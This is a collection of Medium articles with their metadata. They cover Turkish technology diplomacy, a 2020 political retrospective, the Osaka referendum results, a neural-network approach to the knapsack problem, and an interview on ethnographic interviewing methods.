Technology diplomacy. For centuries, armies were the most crucial power of nations. Then came economic statecraft. In the last two decades, diplomats started to talk about soft power — the ability to shape the preferences of others through appeal and attraction. Only in the last few years, “technology diplomacy” has become a tool for foreign policy. This is why more than 30 countries around the world have a startup visa program now (the most famous being Startup Chile). This is also why Denmark, and in turn, France appointed “technology ambassadors.” These countries acknowledge that technology in itself became a “superpower” and they need to establish “diplomatic” relations with the technology actors to get the most of them.
SDG Impact Accelerator is a technology initiative that epitomizes Turkey’s basic pillars about foreign policy: humanitarian values and entrepreneurial spirit. Startups from around the world, including Kenya, Rwanda, the Netherlands, the United Kingdom, the United States, Palestine, Jordan, and India, worked on global technology solutions for the global refugee issue.
Probably, there could not be a better testbed for solutions targeting 60 million refugees around the world than Turkey, given Turkey hosts 4 million Syrian refugees, the largest refugee population around the world. SDG Impact Accelerator brought together United Nations, global philanthropies and businesses with startups to implement real solutions. By walking the walk instead of talking the talk, SDG Impact Accelerator has set a new benchmark for technology diplomacy.
|
https://medium.com/make-innovation-work/three-policy-innovations-that-turkey-is-making-through-the-sdg-impact-accelerator-618b31345d6a
|
['Ussal Sahbaz']
|
2019-09-16 07:49:27.428000+00:00
|
['Techdiplomacy', 'Sustainable Development', 'Sdgs', 'Gates Foundation', 'Undp']
|
Renegade Retrospective 2020
|
Spaceship economy
A key feature of 2020 has been Covid-19 and its impact on society and economy. Friend of Renegade Inc., Steve Keen, predicts that the pandemic will result in a bigger economic shock than 2008 and says it could result in the entire production system breaking down leading to possible shortages of food and medical supplies.
Citing William Baumol’s conceptual understanding of the spaceship economy, the economist argues that the pandemic has unveiled the fatal flaws in what was already a fragile economic system. Pandemics and other unpredictable tragic events highlight the limitations of a hollowed out capitalist economic system that we are told is the most efficient and effective available. Invariably, though, it’s the poorest who end up paying. the price for such a system.
Fellow economist, Richard Wolff, reiterates that the level of displacement is stark:
“The system isn’t working. And that’s not because we have a virus. None of it was planned for. And the reason is simple. In a private profit system, no producer of a test kit or a mask or a ventilator or anything else has any incentive to produce them if they’re not profitable to stockpile them. It turns out that capitalism’s profit system is a very inefficient way to cope with fundamental threats to public health”, says Wolff.
Whilst society suffers as a result of the system’s erosion of public health, author and journalist, Gerald Posner, argues that it’s Big Pharma who end up as the beneficiaries:
“There are parts of the pharmaceutical industry that are salivating at the pandemic, not because they want people to die or because they engineered the pandemic in a secret lab, but because this novel virus gives them a possible once in a lifetime opportunity for enormous profits”, says Posner.
Too much war, not enough investment
As Brexit looms on the horizon, profiting from the NHS appears to be the focus for American health care and insurance companies. Guest, Dr. Bob Gill, argues that the objective of these companies is to bleed the service dry by introducing a pay to play system, lumbering UK citizens with massive administrative and medical costs.
Gill notes that insurance-based system’s create perverse incentives which he says inevitably lead to the breaking of the relationship between doctor and patient. As Gill makes clear, the transformation of what is an amazing public health investment story into a US based health care system, would be a disaster for universal free at the point of delivery health care provision in the UK.
Writer, and guest of the show, Indi Samarajiva, says that successive US administrations since the Reagan era have prioritized war. Alibaba founder, Jack Ma, has similarly argued that in the US there has been too much war and not enough public investment.
One of the by-products of so much US military adventurism overseas is an oversupply of troops arriving back in the country and looking for work, many of whom end up in local police forces. “The military teaches you how to close with, and destroy, the enemy through firepower and manoeuvre, which is the last thing you want a cop to be doing”, says former Intelligence Officer, Scott Ritter.
The killing of George Floyd is not only emblematic of what happens when a militarized US police force gets out of hand but also, as human rights activist, Ajamu Baraka argues, is a trigger point in response to the structural contradictions inherent to neo liberalism that gives rise to systemic police brutality.
More broadly, the inability of the country to manage it’s domestic affairs in a just way relates to the exceptionalism the establishment in Washington has confected for itself on the global stage. As editor and columnist, Margaret Kimberley, succinctly puts it: “You can’t have injustice abroad, but have justice at home. The two are linked. When you have a country that sees itself as having the right to do whatever it wants to anyone, then that ethos is repeated here.”
Barbarism begins at home
One of the most confusing and barbaric events in 2020 has been the Julian Assange trial. Surely journalists and the public can foresee the ramifications of not standing up for freedom of the press? Independent journalist, Richard Medhurst, argues that not only have the corporate and independent media been inept in this regard, but they have engaged in a decade-long smear campaign against Assange.
Medhurst states that if the WikiLeaks publisher is extradited, he will almost certainly be convicted. This will set a precedent for other whistleblowers and mean the end of journalistic freedoms as we know it. Fellow journalist, Taylor Hudak, concurs that the political persecution of Assange and any life sentence handed down to him in a federal supermax prison will deter others into publishing information that is embarrassing to the United States government.
A media blackout is a prerequisite to exporting so-called democracy globally at the point of a gun. But that playbook is beginning to look dated, especially as we see that Imperialism 2.0 has little or no regard for the people it’s meant to be liberating. Author and professor of law, Daniel Kovalik, explains how Washington’s post-WW2 tactic of maintaining its historically dominant role has shifted from direct and indirect control pre-Iraq, towards a strategy of chaos and plunder. This strategy has been retreat under Trump following the killing of the Iranian general, Qassem Soleimani.
Investigative journalist, Gareth Porter, outlines the logic:
“The US national security state really needed Iran as an adversary in order to partially, at least, try to make up for the loss of the Soviet Union as its primary adversary and primary excuse for the Cold War level of spending on the military and intelligence”, says Porter.
Business as usual?
But now with the American election jamboree out of the way, many believe that the US will return to ‘business as usual’ under president-elect, Joe Biden. Indeed, as CODEPINK National Co-Director, Ariel Gold reminded us, Biden himself promised the American people a return to ‘normal’ during his election campaign:
“Normal, is the problems that we know all too well of neo liberalism. Normal, is a bloated Pentagon budget. Normal, is our endless wars. Normal, is corporate control of so much of the American politics. Normal, is in a massive infusion of money in politics. So normal is not something to look forward to”, says Gold.
The question is, can society afford the kind of phenomenal scale of financial stimulus needed to maintain the status quo?
Author and Educator, Graham Brown-Martin, argues that we need to adopt a different economic model to the ‘extractive’ one introduced following WW2:
“We simply can’t have an economy which damages the environment, creates gross inequality, and also, ultimately, does lead or creates the environment or the conditions for a pandemic to thrive”, says Brown-Martin.
At the end of a year like 2020, it’s easy to feel hopeless. But this misses the point. The real heroes of the year weren’t the presidents, politicians, prime ministers and corporate CEOs. The real heroes have been the workers — teachers, doctors, nurses — in short, all those people who create real value. They’ve kept our society and our economies moving. And what belies this is a new understanding that we are collectively way more powerful than we think.
Economist, Ann Pettifor, explains:
“I want us to understand that we have power, that the private finance sector, Wall Street, is dependent on the public institutions. These are public servants. They’re heavily reliant on public institutions, not just in times of crisis, but all the time. The thing that the banks want more than anything in the world is our debt. And so therefore, we can say, yes, OK, but if you want this stuff, these are the terms and conditions. So I want us to feel that power”, says Pettifor.
Watch the full episode now
|
https://medium.com/@renegadeinc/renegade-retrospective-2020-472e2f853df
|
['Renegade Inc.']
|
2020-12-27 18:26:04.385000+00:00
|
['Wikileaks', '2020', 'Covid 19', 'Brexit', 'Capitalism']
|
The End of Ishin no Kai’s Dream
|
NO CAMP
The lower turnout in 2020 also produced a decrease in the votes receievd by the NO camp, supported by the local LDP, and the Opposition parties the JCP & the CDPJ.
They received over 692.996 votes, 12.589 votes less than 2015 when the NO side that included Komieot won 705.585 votes that were enough to make them victorious.
2015 Referendum: 705,585 2020 Referendum: 692,996 Change: -12.589
A first look at the map lets us know about the wide disparity os swings through the city. It jumps to the eye, especially, how large was both the increases and decreases of NO votes. These changes were in reverse to what we found in the YES camp but of different proportions.
Change of total raw votes for the NO camp
In an environment of low(er) turnout, the advantage the NO side managed to achieve is that in total they were able to offset their huge loss of vote in their former strongholds with a raw increase in districts that had not been, at all, favorable to them in 2015 (the same ones where the total vote cast increased, over a larger population).
Their increase in raw votes was particularly strong in districts where the YES campaign had been strong back in 2015:
Kita-Ku +4688
Nishi-Ku +3866
Chuo-Ku +3157
Fukushima-Ku +1740
However, their decrease in votes in some of the best districts they had in 2015 was a point that confounded me on election night. In those places, the total turnout plummeted too:
Hirano-Ku -4652
Suminoe-Ku -4042
Ikuno-Ku: -3105
In the end, these losses, however, were not big enough to allow the YES to overcome them.
For weeks poll had shown a tight race in which the YES campaign led, but always by narrow margins, and within the margin of error. As I said on my Twitter @nihonpolitics, it was likely that the 10%-15% of undecided leaned towards the NO, as their nature did not predispose them towards supporting such a radical idea that would have abolished the City of Osaka itself. In the end, Osaka Ishin no Kai failed once again in trying to pass the plan, even with the help of Komeito.
Consequences of the rejection of the Osaka Metropolis Plan Referendum
Although a local matter in Osaka, it is no mistake that the event of the referendum could have big national repercussions for all the different parties in Japan. I ould like to summarize some ideas:
Ishin no Kai [維新の会」: Ishin no Kai, the main proponent of the Osaka Metropolis Plan, and the party that governs both the city of Osaka and Osaka Prefecture was the main loser of the referendum. The citizens of Osaka rejected last month for a second time, after 2015, their idea of abolishing the city of Osaka and turning it into four or five special districts at the image of Tokyo.
Five years later after the first, also failed, referendum, they repeated the same mistakes:
Ishin no Kai polarized to the extreme the question of the “Osaka Metropolis Plan”. It was their plan, their foundational dream (as I explained in a previous post) and for better, or worse, they made people identify support for their party with support for the plan, which limited from the beginning the electoral ceiling of the plan.
It was their plan, their foundational dream (as I explained in a previous post) and for better, or worse, they made people identify support for their party with support for the plan, which The leaders of Ishin no Kai (Mayor Matsui Ichiro and Governor Yoshimura Hirofumi) failed once again to adequately explain the benefits of the Osaka Metropolis Plan . As polls showed, a large majority of the citizens of Osaka (above 70%) acknowledged that they did not fully understand what the plan was about or the benefits it would supposedly bring them. It was an inexcusable mistake that doomed the plan from the start. If the benefits existed, any, concerns about a possible decrease in financing for schools and social services overrode the idea of the possible long-term savings for public finance, after eliminating duplicities that the proponents argued.
. As polls showed, a large majority of the citizens of Osaka (above 70%) acknowledged that they did not fully understand what the plan was about or the benefits it would supposedly bring them. It was an inexcusable mistake that doomed the plan from the start. If the benefits existed, any, concerns about a possible decrease in financing for schools and social services overrode the idea of the possible long-term savings for public finance, after eliminating duplicities that the proponents argued. The overwhelming control of Osaka politics by Ishin no Kai was countered by a polarized environment: For over a decade, Ishin no Kai has fully controlled the government of Osaka city and Prefecture. Although they have needed allies to govern (I will come back to them later), their electoral wins have been so commanding at the local, prefectural and national level that it is likely that felt invincible, immune to criticism. However, the people of Osaka had other plans. In a face-to-face match, where political parties disappeared, it failed for the second time in five years to convince +50% of the citizens of Osaka City about their plan. It showed that Ishin no Kai has a ceiling that does not reach 50% and includes supporters from other parties.
Ishin no Kai is the dominant party of Osaka, with less than 40% of the vote (at least in national elections).
Press conference after the defeat: Gov. Hirofumi (left) and Mayor Ichiro (right). Source: https://www.jiji.com/jc/article?k=2020110200029&g=pol
The first victim of the defeat was Osaka Mayor Matsui Ichiro, the leader 「代表」of the party, who decided shortly after the defeat that he will serve the remainder of his term as Mayor and then resign.
Matsui Ichiro had become the leader of the party in 2015 after the exit of the founder Hashimoto Toru, who resigned after the first referendum defeat. It certainly looks like Matsui Icho is following his path. He will retire once his term as Mayor ends in 2022.
On the 21st of November, in a special party meeting, the young Governor of Osaka Yoshimura Hirofumi was elected the new leader of the party by 232 votes against 11 won by Katayama Toranosuke「片山虎之助」, a veteran party member of the House of Councillors.
Komeito「公明党」: The second big loser of the referendum, very closely behind Ishin no Kai, was Komeito, the Buddhist-based party.
Komeito, which had opposed the Metropolis Plan in 2015, this time around caved to the threats of Ishin no Kai and changed his position. To understand Komeito’s surprising about-face, we have to understand their politically vulnerable situation in Osaka (I will succinctly sum it up. You can see a larger explanation in my preview article).
Komeito currently holds four single-member districts from Osaka Prefecture in the House of Representatives (Diet), but they fear a lot a possible challenge by Ishin no Kai candidates in those SMDs (single-member districts) which would possibly threaten a party stronghold like Osaka for Komeito. Although the party has avoided these challenges before, it has always been there hovering over their faces like the sword of Damocles and it will continue there once the referendum has contributed to a certain breakdown of the bilateral Komeito-Ishin ties.
Komeito astonishingly failed to convince its own supporters to vote YES on the referendum: Polls before the referendum and exit polls continuously showed that not more than a third (or 40%) of the supporters of the party favored the Metropolis Plan despite the enthusiastic support of its leadership. Yamaguchi Natsuo, the leader of Komeito and member of the Houe of Councillors from Tokyo, even visited Osaka in the last weeks to campaign alongside the leaders of Ishin no Kai. It was not enough.
Press conference after the defeat: Satou Shigeki (right) & Toki Yasuo (far right) . Source: https://webronza.asahi.com/politics/articles/2020110200008.html
It remains to be seen the effects of the defeat in the local Komeito Chapter: Although the Komeito supporters were split, its local leadership embodied in Sato Shigeki, who represents Osaka’s 3rd district in the Diet and Toki Yasuo, Komeito’s Secretary-General in Osaka Prefecture, were personally invested in the campaign and they were defeated. Soka Gakkai, the Buddhist sect behind the party, was torn as well and its indecisiveness likely contributed to the final defeat.
LDP [自民党」: In order to do an assessment of the results of the referendum for the LDP we should distinguish in the analysis between the local LDP chapter in Osaka and the national LDP led by newly elected Prime Minister Yoshihide Suga. After withstanding a lot of pressure, and internal division, the LDP chapter in Osaka, in the end, decided to come out against the Osaka Metropolis Plan, as it had happened in 2015. When the exit polls came out, over half of the LDP supporters went along with its local leadership and opposed the plan.
After several head-to-head matches losses against Ishin no Kai in local elections like Governor and Mayor race, it was a unique opportunity for the local LDP to regain a foothold in the city, showing a contrast with Ishin no Kai, the party that has become dominant for more than a decade in the city of Osaka and beyond.
After a string of defeats, the LDP finally had a victory over its direct competitor for the control of the city (and prefectural) politics: In the defeat of the plan, it was instrumental the strength of the LDP chapter of the city of Osaka, which was overwhelmingly against the plan form the beginning. In internal deliberation, they managed to turn the whole Osaka LDP group against the plan even though the LDP members at the prefectural level were much more divided and supportive of the Osaka Metropolis Plan.
Kitano Takeo, Secretary-General of the LDP in the City of Osaka. Source: https://www.sankei.com/politics/photos/201102/plt2011020001-p1.html
Kitana Taeko「北野 妙子」, the leader fo the LDP in Osaka City, embodies the core demographic opposed to the Osaka Metropolis Plan: A women in her 60s was according to the polls the worst demographic for Ishin no Kai’s plan: women and of older age.
An experienced politician, Kitana Taeko became the main face of the LDP’s opposition to the plan. She is a current 4-term representative in the city council from the second most-supportive district of the plan, Yodogawa-Ku (55.1% YES). Keep an eye on her for future office.
Prime Minister Suga was not a winner in the referendum: Prime Minister Suga is a close ally of Ishin no Kai and its former leader Matsui Ichor, as I explained in my previous post. That explains why he was never open and transparent about his position or the party’s at the national level regarding the referendum. He was moot the whole time calling for respecting the peoples’ will and a 議論 around the issue, the same position held by the LDP Secretary-General Nikai Toshihiro. The final rejection of the plan was a defeat for his local Ishin no Kai allies, which might become essential in the future for the constitutional reform.
Japanese Opposition: Japanese Communist Party 「共産党」and Constitutional Democratic Party of Japan「立憲民主党」: Arguably, the Japanese opposition formed by the JCP and the CDPJ, could be considered a winner after the defeat of the Osaka Metropolis Plan in the referendum.
In recent years, even more than the LDP, both parties have become antagonists to Ishin no Kai and its former leader Osaka Mayor Matsui Ichiro, who does not lose time to quickly troll them on Twitter every chance he gets. This was their revenge and it worked out fine.
The Opposition has a problem in Osaka Prefecture though: Osaka is one of their weakest places in the whole country. The disintegration of the old Democratic Party has not been repaired yet, and the division with the old Japanese CommunistParty has precluded further cooperation for some time, politicians and voters still hold old grudges from bygone times. However, this referendum provided a fantastic opportunity for the Japanese Opposition to jump-start its cooperation for future elections:
The referendum coincided with the reorganization of the CDPJ in its new form, devoid of the most conservative elements that decided to continue with Tamaki Yuichi in a much smaller DPFP a new political party of two dozen members: The CDPJ was deeply involved in the campaign against the plan. Its leader Edano Yukio went down to Osaka to campaign and rallied his supporters towards an overwhelmingly (according to exit polls) rejection by the CDPJ supporters of the Osaka Metropolis Plan. Exercises like this work well to build local organizations, which the party needs right now to grow beyond the single digits in Osaka.
The CDPJ was deeply involved in the campaign against the plan. Its leader Edano Yukio went down to Osaka to campaign and rallied his supporters towards an overwhelmingly (according to exit polls) rejection by the CDPJ supporters of the Osaka Metropolis Plan. Exercises like this work well to build local organizations, which the party needs right now to grow beyond the single digits in Osaka. Women, the backbone of the CDPJ and the JCP were at the forefront of the opposition: Out of the seven members the CDPJ has from Osaka prefecture (two in Single-member districts and five in proportional representation list) two of them are women and they were at the front of the campaign crisscrossing Osaka (see photo below).
1) The leader of the CDPJ Osaka Prefecture chapter is Tsujimoto Kiyomi (right in the picture) who has been representing Osaka’s 10th district in the Lower House since 1996.
2) Otsuji Kanako (left) became part of the Lower House in 2017 representing Osaka’s 2nd district through proportional representation and has already become a recognizable face within the party, as a cadre in a growing cohort of young progressive women where Tsujimoto Kiyomi also belongs.
Members of the CDPJ (Otsuji Kanako, left & Tsujimoto Kiyomi, right) campaign against the plan in Osaka. Source: https://mainichi.jp/graphs/20201012/hpj/00m/040/002000g/6
The Japanese Communist Party, for its part, is the strongest Opposition party in Osaka above the CDPJ. It enjoys a strong implementation in the city and the prefecture with experienced grassroots that are essential, along with citizen movements, to rally supporters to the polls. They were probably key in moving apathetic or undecided voters towards voting NO in last month’s referendum.
Yamanaka Tomoko, member of the Osaka City Council from the Japanese Communist Party. Source: http://yamanaka-tomoko.wajcp.net/category/%E3%83%96%E3%83%AD%E3%82%B0/page/2
The JCP’s campaign was also led by a woman: Yamanaka Tomoko「山中智子」a six-term member of the Osaka City Council from Joto-Ku.
Women are a central part of the Japanese Communist Party, in its leadership and among its supporters, and they showed up to reject the Osaka Metropolis Plan.
|
https://medium.com/@javierdelgadoch95/the-end-of-ishin-no-kais-dream-367c36b4a0fb
|
['Javier Delgado Chacon']
|
2021-01-03 21:41:29.236000+00:00
|
['Osakapolitics', 'Japanpolitics', 'Japan', 'Osaka']
|
Neural Knapsack
|
Neural Knapsack
In some cases of data science, it is needed to run a specific algorithm on the output of the model to get the result. Sometimes it is as simple as finding the index of the maximum output, other times, more advanced algorithms are needed. You may run the algorithm after running the inference. However, designing a model that can run the algorithm internally have some advantages. Solving the problem of knapsack using neural networks not only helps the model run the knapsack algorithm internally but also allows the model to be trained end to end.
What is the knapsack problem?
My lovely computer algorithm teacher explained the knapsack problem to me using this story. Think of a thief on a robbery. There are some items available to be robbed. Each item has its own weight and value. The thief has a knapsack with a determined capacity which indicates the maximum amount of weight that he (or she) can carry. The thief’s profit is calculated via summing over the chosen item’s values. Our goal is to maximize the profit while keeping the sum of chosen items’ weights less than the knapsack’s capacity.
According to Wikipedia:
“Given a set of items, each with a weight and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. It derives its name from the problem faced by someone who is constrained by a fixed-size knapsack and must fill it with the most valuable items”
In this article, we try to solve the knapsack problem using neural networks.
The data
The first step is to prepare data. We use random integers for items’ weights, items’ prices and the capacity of the knapsack. After creating the problem, we use brute force to find the optimum solution.
A generated knapsack problem:
Weights: [13, 10, 13, 7, 2]
Prices: [8, 7, 9, 6, 4]
Capacity: 27
Optimum solution: [0, 1, 1, 0, 1]
Normalizing the input is a part of every machine learning project as it helps the model to generalize better. To normalize each knapsack problem:
Divide the prices by the maximum price of the problem.
Divide the weights by the capacity.
Remove the capacity from the inputs as it is embedded in the weights now.
The normalized form of previously created knapsack problem:
Weights: [0.48, 0.37, 0.48, 0.26, 0.07]
Prices: [0.89, 0.44, 1.00, 0.67, 0.44]
Optimum solution: [0, 1, 1, 0, 1]
The dataset consists of ten thousand samples for training and two hundred for testing.
The model
The model we choose for this task is a fairly simple model. It has two inputs and an output. At first, the inputs are concatenated together. The result enters two sequential dense layers activated by sigmoid non-linearity. The output of the second dense layer is the output of the model. Implementation of the model in Keras:
The following image visualizes the architecture of the model:
Model architecture
The metrics
The knapsack problem requires metrics other than the binary classification accuracy for evaluation. The first metric we introduce is called “overpricing”. As its name suggests, it evaluates the average difference between the prices of the chosen items and the optimum solution. It is implemented in Keras framework as follow:
Another vital metric is the amount of capacity used more than the knapsack’s capacity. The “space violation” is the positive difference between the sum of the chosen items’ weights and the knapsack’s capacity. It may be implemented in Keras as follow:
Supervised approach
In the supervised approach, we input weights and prices to the model and expect the optimum solution as the output. In this process the model trains using the cross-entropy loss function.
After training the model with the supervised approach, we got the following results after 512 epochs.
Model results(Train/Test):
Loss: 0.24 / 0.24
Binary accuracy: 0.89 / 0.89
Space violation: 0.04 / 0.06
Overpricing: 0.06 / 0.08
Unfortunately, there are two fundamental problems with the supervised approach:
The optimum solution is mandatory to start training.
We don’t have any control over the space violation and overpricing.
We will try to address these problems in the unsupervised approach.
Unsupervised approach
We want to train the model without computing the optimum solution. Hence, we need a new loss function. Accordingly, we subsequently define the w, p, c and o as the items’ weights, the items’ prices, the knapsack’s capacity and the model’s output. At first, we need to maximize the sum of chosen items’ prices. It may be calculated via:
Meanwhile, we want our picks not to surpass the knapsack’s capacity. This value may be formulated via:
Finally, we want to maximize the TotalPrice while minimizing SpaceViolation. This could be formulated via:
In order to have control over the SpaceViolation, we add the λ coefficient to the second term. The final loss formula is:
We can implement the new loss in Keras like this:
Using this loss function, we train the neural network in an unsupervised fashion.
Note 1: The λ parameter is named cvc in the Keras implementation of knapsack loss.
Note 2: Although we receive the optimum solution (y_true) as a function argument, we do not use it for computing the loss. We can’t either omit the argument as it is a Keras constraint to receive both predicted and expected outputs in the loss functions.
Note3: The capacity of the knapsack is equal to 1 as we normalized the data.
After training the model with the unsupervised approach, we got the following results after 512 epochs.
Model results(Train/Test):
Loss: -1.83 / -1.75
Binary accuracy: 0.89 / 0.89
Space violation: 0.05 / 0.06
Overpricing: 0.12 / 0.14
Increasing the value of cvc (λ) will cause in less space violation and overpricing. It will also reduce the binary accuracy if it is increased too much. I found that a reasonable value for it might be 5.75.
Conclusion
As discussed before, we solved the problem of knapsack using neural networks while the gradient can pass through the network. So our model could be trained end to end using any variation of the back-propagation algorithm.
This article could be used in recommender systems, especially the ones which recommends multiple items while maintaining space usage (like the banner Ads).
|
https://towardsdatascience.com/neural-knapsack-8edd737bdc15
|
['Shayan Hashemi']
|
2019-08-31 15:27:33.732000+00:00
|
['Deep Learning', 'Supervised Learning', 'Unsupervised Learning', 'Knapsack Problem', 'Neural Networks']
|
It’s About the Stories that People Are Willing to Tell You: An Interview with Guha Shankar
|
Michelle Stefano: Hello, Guha, let’s first get into what brought you to ethnography and its methods…
Guha Shankar: My undergraduate degree in radio, television, and film at [the University of North Carolina] Chapel Hill is a foundational basis for the work I’ve done for the last…however long it is…and I don’t want to name the years as that would make me feel very sad and old [laughs]! So, we were exposed in classes to theories, concepts, and the technical language in media and film studies. We would talk about people doing ethnographic work, we would look at documentary films and listen to documentary audio, and so on. We also had some hands-on training in shooting film and making audio recordings, principally in a formal studio setting. But the practical experiences–and this may get to the notion of “ethnographicness”–in producing field recordings were by and large absent from our repertoire, simply because of time and resources. You know, in a department of 155 people, there was not a lot of equipment to go around, so you’d take your training where you could get it.
That experience, as limited as it was, got me into freelance jobs and TV crews when I came out of school and moved to Washington, DC, in 1983. I had gigs like production grip and occasional audio engineer. And then came a longer gig: the Smithsonian’s then Office of Folklife Programs, from 1985 to 1993. I was principally hired as a film editor and general media production specialist. There, I had this amazing experience of on-the-job training in ethnographic documentary production, and I’ll talk about three different ways in which that taught me what I know about ethnographic interviews, and ethnography in general.
First of all, I listened to hours of raw, uncut interviews and conversations…and you’re doing that in order to listen–well, this is how it works for me–for the content of the recordings and what they illustrate about the cultural and historical context of the film, right? So, from a research and scholarly perspective, that’s one hat we put on. But then you’re also listening to what piece of audio–or voice, cultural expression, dialogue–you think ought to be subsequently distilled and edited into a final product, and that’s from a production standpoint. So, at the same time, I was learning to think in both those registers.
Then, a second training ground was the [Smithsonian Folklife] Festival, and I worked every summer at its stages and got to listen to truly remarkable and sensitive folklorists conduct interviews and solicit stories on the festival grounds, on the narrative stages, during demonstrations of craft and cooking, and with a range of community members. I got this invaluable front-row seat to Alicia Gonzalez, Betty Belanus, Lynn Martin, Jim Leary, my boss Tom Vennum, Nick Spitzer, and many others engage in the art of conversation and structure it for a public audience. I was able to understand how folklorists mediate between particular community perspectives and the broader audience: the notion that you’re going from the unknown to the known, from that world of the hidden and obscure to a broader [public] audience, and that was pretty eye opening. And you had to do it within certain constraints of time and space in the festival setting.
The third training ground was accompanying scholars and folklorists out into the field on documentary film and radio productions, as production coordinator, driver, grip…you know, chief cook and bottle washer, as we often do [laughs]. I experienced firsthand what “deep hanging out” really means, right? And “deep hanging out” is a better way for me to think about what ethnographic practice actually is. These settings allowed me to see how people merged deep hanging out with journalistic sensibilities. I watched, learned, and sometimes I was able to participate in a field shoot, and observe expressions, events, occupational practices, and behaviors among and between cultural community members. I listened to my senior colleagues inquire and probe, and get into the nuances of what was going on around us.
Specific examples that were formational for me were going out with Bob McCarl, specialist in occupational folklore, on a production with DC’s firefighters for the Smithsonian Folklife Studies monograph/film series; this was the late 1980s and that project ended with lots of footage, but regrettably no completed documentary (for complicated reasons, shall we say). I worked with Frank Proschan on his research documentation with Khmu refugees, resettled in Stockton [California]: people who came to California from Southeast Asia. The last thing I worked on as production coordinator at the Smithsonian was with Frank Korom and John Bishop on a project with communities of Indo-Trinidadian Muslims. That effort resulted in Hosay Trinidad, both a book and a film, and led to my subsequent dissertation research in Jamaica. While in graduate school, I went on to work with Jake Homiak (at the Smithsonian National Anthropological Archives) and Rastafari communities in Jamaica. In those instances, I was principally the production coordinator, and the scholars did most of the interviews, but they were really generous and asked for my input not only on technical matters, but also in terms of enabling me to participate more fully in the research process, such as asking questions in the course of our filming. That was a pretty heady experience–“wow” moments, really–for someone who was used to being way behind the camera and/or microphone to get such hands-on experience in the research process.
I took these experiences with me to grad school, where I ended up doing my fieldwork in Jamaica, completing my dissertation on race, citizenship, and belonging among South Asians in the diaspora. Interestingly, grad school is not a place where people necessarily get any technical training in doing interviewing and/or ethnographic fieldwork. So, my professors found out that I had this background in ethnographic production and they’d get their students, my fellow classmates, to come and talk to me…and ask, Hey what do I do in terms of equipment? What do I do in terms of going out in the field to do a recording? This was good for my long-term practice and got me back into media documentation in a way that I hadn’t had much of a chance to do during my first years as a graduate student.
So, more recently, the AFC was where I got the chance to expand on the teaching aspect of ethnography. I was able to do that by taking the principles and methods I learned earlier and formalize them in a teaching setting, under the umbrella of the annual AFC field schools in cultural documentation training, shaped by David Taylor, former Head of Research and Programs at the AFC (my immediate boss at the time). He gave me great insight and invaluable guidance on how to translate and teach esoteric concepts that we as fieldworkers have imbibed–that is, we’ve naturalized (to invoke Bourdieu) certain ideas and skills over time and through repetition, to the extent that our practice and our methods go without saying because they come without saying. Yet, in the context of a teaching situation, you have to translate–get those esoteric techniques and approaches out of your head–and articulate them publicly and in ways that beginners will understand, practice, and reproduce in their own work.
The other key thing I learned is the crucial need to develop and record metadata–that is, the notion of developing metadata as a sustainable set of information to accompany one’s field recordings. This is not something that folklorists are trained to do, let alone scholars and professional counterparts in other fields and disciplines. It’s a pity, because if we call ourselves ethnographic practitioners, then we need to know what we’re doing with the products of our research–how to categorize and describe them to make them sustainable and useful for subsequent generations. That this is not taught as a regular part of documentary practice is no one’s fault, but this gap is what the AFC field schools addressed: integrating the methods and approaches established by those wonderful field survey projects that the Center conducted back in the 70s and 80s [e.g. the 1977 Chicago Ethnic Arts Project and the 1979 Montana Folklife Survey Project, among others]. A large, critical part of the training that AFC did during the field surveys, mostly under the guidance of Carl Fleischhauer, and Mary Hufford in several instances, was to expose fieldworkers to the concept and practice of how to contextualize and capture the “scene,” by means of documentary media, and the accompanying metadata.
And that’s what stands out about what we do at the AFC in terms of raising metadata in importance…and we do so because it makes our collections a hell of a lot easier to use and find. Maggie Kruesi, former AFC cataloger, was great at cementing that in my head when we did field schools together–that need to develop and record metadata in the field and to ensure that that step is adapted as a core principle and practice and, as such, is not ancillary or an after-thought to the documentation and the interview. So, the first thing I lead off of now in my presentations, thanks to Michael Taft [former Head of the AFC Archives], is the principle that the fieldworker is the first archivist. And now, in the digital age, as I’ve worked in the field schools for the last 15 years or so, there is this corollary that the fieldworker is the first digital content manager, because everything digital now has to be managed in some shape or form, and without that there is no product, no oral history, etc.
MS: OK, well, let me jump in. And I already feel bad, so I need to stamp this as March 26, 2019, a Tuesday…just adding in the metadata [laughter]! So, I’m going to back up a bit and unpack some of the things you’ve said. I’m using this term, “ethnographic interview,” which I think is rather broad; nonetheless, you brought up these really interesting ideas of “deep hanging out,” “conversations”…and I know there can be differences between the ethnographic interview and “oral histories.” So, can you walk us through how you define these interview types?
GS: For me, the interview that takes place in an ethnographic setting, or with an ethnographer, is only one aspect of a complex of practices, right? So, the formal sit-down interview that we’re having now occupies an hour or two of our time. But, what do you do for the other 40 hours of being out in the field? What you do for the rest of the day involves the process of deep hanging out, or “participant observation.” Every one of those moments of interaction and communication comprises ethnography, when looking at it from a broader viewpoint, and the interview is one communicative act among many others. Where I see ethnographic practice differing is in the informal give and take, and the unstructured occasions–such as over a meal, after the work day, over a beer, when you’re out with somebody who is doing subsistence farming or shucking oysters, playing music, singing. Those are the moments when greater insight into a sense of community is actualized and made apparent, right? So, ethnography approaches documentation and information gathering from a perspective attuned to nonverbal communication, embodied expressions, movement, all of which are far different paths to understanding socio-cultural life than you get by means of the oral history interview alone.
For oral history practitioners, the oral history is the focal point of the encounter. Over the course of two hours or more, they are going to conduct an interview, and that interview is going to formulate the basis of–or buttress, supplement, augment–received understandings about events that they have knowledge of through deep research, previous publications, and other sources. And the interest lies in understanding what individuals experienced and what they remember from particular moments in time, with reference to larger political, cultural phenomena. So, for the Civil Rights History Project (CRHP), we might situate an interview in the context of the principal question: What did you do during the March on Washington in 1963? What brought you to that moment? Tell us what your days were like helping organize the event. While this approach yields rich details and amazing reflections, large parts of people’s lives are less documented, simply because of the form of the encounter between interviewer and interviewee, and the subject focus, which does not provide the space to do more. In this regard, ethnographic practitioners center attention on the practice of everyday life, as much as the grander questions of history, such as Where were you when the Berlin Wall fell? Here, we also ask: How do you do things, where do you do them, who did you learn from, what are the community interactions…who are your people? Those are the kinds of things that the ethnographic interview asks about in ways that maybe other disciplinary methodologies don’t, or at least not all of the time.
